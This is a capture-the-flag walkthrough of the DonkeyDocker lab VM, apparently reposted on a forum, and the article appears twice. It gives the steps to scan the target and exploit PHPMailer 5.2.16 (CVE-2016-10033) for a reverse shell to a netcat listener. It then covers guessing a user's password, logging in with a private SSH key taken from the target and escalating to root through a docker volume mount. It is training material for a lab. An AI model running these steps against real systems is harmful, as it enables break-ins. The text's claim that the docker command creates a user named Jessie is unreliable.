kdf9p8
Ad Metrics Pro
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Today we are going to solve a fun Vulnerable Lab DonkeyDocker, download this VM Machine from here.
The credit for developing this VM machine is goes to Dennis Herrmann who hid 3 flags inside this lab as a challenge for hackers.
Letâs Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.120 but you will have to find your own)
Use nmap command for port enumeration
As you can see port 22 for ssh and 80 for HTTP are open, so letâs explore port 80 through Browser
After browsing I found three tabs Home, About and Contact but didnât found any clue for the next step, then I decided to scan the target directory using dirb scan.
Now open the terminal in Kali Linux and type the following command:
From scanning result, I choose the highlighted directory http://192.168.1.120/mailer/examples/ for further enumeration.
Here, we get to know that PHPMailer is running on a targeted system. Let try to find out its version.
So After browsing a bit about PHP Mailer, we came to know that how to get the version of phpmailer
We got the version of PHPMailer i.e. 5.2.16.
From Google, we came to known that PHPMailer 5.2.16 is vulnerable to Remote Code Execution (python) {CVE-2016-10033}. Exploiting PHPMail with the back connection (reverse shell) from the target. You can download this exploit from here.
After Downloading the Python File and make the following changes:
Now start netcat at the same port on which the payload is binding i.e. 4444 for establishing a reverse connection with the target.
Before you run the python script, type following command in a new terminal which will install the exploit dependency.
Now run the script in order to exploit the target as shown in the given image.
Move back netcat shell and here you will find that it is connected to the victim but not able to access proper shell of the victim system, therefore, type the given command in order to access victim shell properly as shown in the image.
Once you got the victim shell type following commands for finding the hidden flag.
Here we found user smith which is a directory has flag.txt let approach toward this directory.
While again opening the smith directory, we got âPermission deniedâ.
Then we used su smith to instead of sudo because sudo is not accessible in this shell
For Password, we tried âsmithâ and successfully get smithâs shell
Now we are inside smith shell, type following command to get the flag
Great!! Successfully capture the 1st flag
Moreover, if you notice the given image. You will find next clue âI like 1984 written by Geoge ORWELLâ it could be possible that this might be the user name having a 2nd flag inside it.
Type following command to view all directory list
We got the authorized keys, id_ed25519 and id_ed25519.pub in SSH directory, letâs open these key one by one
In id_ed25519 we get the OpenSSH Private Key and this key is authorized for orwell@donkeydocker. Now copy the private key and past inside the text file.
Save this Private Key in a file as id_rsa as shown in the given below image.
Now using ssh login by
Here you will be greeted by the Donkey Docker Shell. Now check directory list for the 2nd flag
Nice!! Successfully got the 2nd shell
Now for the last flag, we tried a lot of different tricks but nothing seems to be getting through so we tried a method about which you can learn from here.
Type following command
This created a user named Jessie and gave it root access through privilege escalation; check all directory lists inside it, here we get the flag.txt file.
Now to open this file we will use the previous command just with slight modification as shown:
Awesome we got 3rd flag also.
Author: Pavandeep Singh is An Ethical Hacker, Cyber Security Expert, Penetration Tester, India. Contact here
The credit for developing this VM machine is goes to Dennis Herrmann who hid 3 flags inside this lab as a challenge for hackers.
Letâs Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.120 but you will have to find your own)
Code:
netdiscoverUse nmap command for port enumeration
Code:
nmap -sV 192.168.1.120As you can see port 22 for ssh and 80 for HTTP are open, so letâs explore port 80 through Browser
After browsing I found three tabs Home, About and Contact but didnât found any clue for the next step, then I decided to scan the target directory using dirb scan.
Now open the terminal in Kali Linux and type the following command:
Code:
dirb http://192.168.1.120From scanning result, I choose the highlighted directory http://192.168.1.120/mailer/examples/ for further enumeration.
Here, we get to know that PHPMailer is running on a targeted system. Let try to find out its version.
So After browsing a bit about PHP Mailer, we came to know that how to get the version of phpmailer
Code:
http://192.168.1.120/mailer/VERSIONWe got the version of PHPMailer i.e. 5.2.16.
From Google, we came to known that PHPMailer 5.2.16 is vulnerable to Remote Code Execution (python) {CVE-2016-10033}. Exploiting PHPMail with the back connection (reverse shell) from the target. You can download this exploit from here.
After Downloading the Python File and make the following changes:
- Open the file and add â# coding: utf-8â at the beginning.
- Set target = â
http://192.168.1.120/contactâ (victim IP), it is the location where backdoor.php get uploaded in the victimâs machine automatically. - Give attacker IP: 192.168.1.101(Kali Linux IP) inside payload code
- After making the above changes save it.
Now start netcat at the same port on which the payload is binding i.e. 4444 for establishing a reverse connection with the target.
Code:
nc -lvp 4444Before you run the python script, type following command in a new terminal which will install the exploit dependency.
Code:
pip2 install requests_toolbeltNow run the script in order to exploit the target as shown in the given image.
Code:
python 40974.pyMove back netcat shell and here you will find that it is connected to the victim but not able to access proper shell of the victim system, therefore, type the given command in order to access victim shell properly as shown in the image.
Code:
python -c 'import pty;pty.spawn("/bin/bash")'Once you got the victim shell type following commands for finding the hidden flag.
Code:
ls
cat main.shHere we found user smith which is a directory has flag.txt let approach toward this directory.
Code:
cd home
lsWhile again opening the smith directory, we got âPermission deniedâ.
Then we used su smith to instead of sudo because sudo is not accessible in this shell
Code:
su smithFor Password, we tried âsmithâ and successfully get smithâs shell
Now we are inside smith shell, type following command to get the flag
Code:
ls
cd /home/smith
ls
flag.txt
cat flag.xtGreat!! Successfully capture the 1st flag
Moreover, if you notice the given image. You will find next clue âI like 1984 written by Geoge ORWELLâ it could be possible that this might be the user name having a 2nd flag inside it.
Type following command to view all directory list
Code:
ls -alWe got the authorized keys, id_ed25519 and id_ed25519.pub in SSH directory, letâs open these key one by one
Code:
cat authorized_keys
cat id_ed25519
cat id_ed25519.pubIn id_ed25519 we get the OpenSSH Private Key and this key is authorized for orwell@donkeydocker. Now copy the private key and past inside the text file.
Save this Private Key in a file as id_rsa as shown in the given below image.
Now using ssh login by
Code:
ssh -i id_rsa [email protected]Here you will be greeted by the Donkey Docker Shell. Now check directory list for the 2nd flag
Code:
ls
flag.txt
cat flag.xtNice!! Successfully got the 2nd shell
Now for the last flag, we tried a lot of different tricks but nothing seems to be getting through so we tried a method about which you can learn from here.
Type following command
Code:
docker run âv /root:/hack -t debian:jessie /bin/sh -c 'ls -al /hack'This created a user named Jessie and gave it root access through privilege escalation; check all directory lists inside it, here we get the flag.txt file.
Now to open this file we will use the previous command just with slight modification as shown:
Code:
docker run -v /root:/hack -t debian:jessie /bin/sh -c 'cat /hack/flag.txt'Awesome we got 3rd flag also.
Author: Pavandeep Singh is An Ethical Hacker, Cyber Security Expert, Penetration Tester, India. Contact here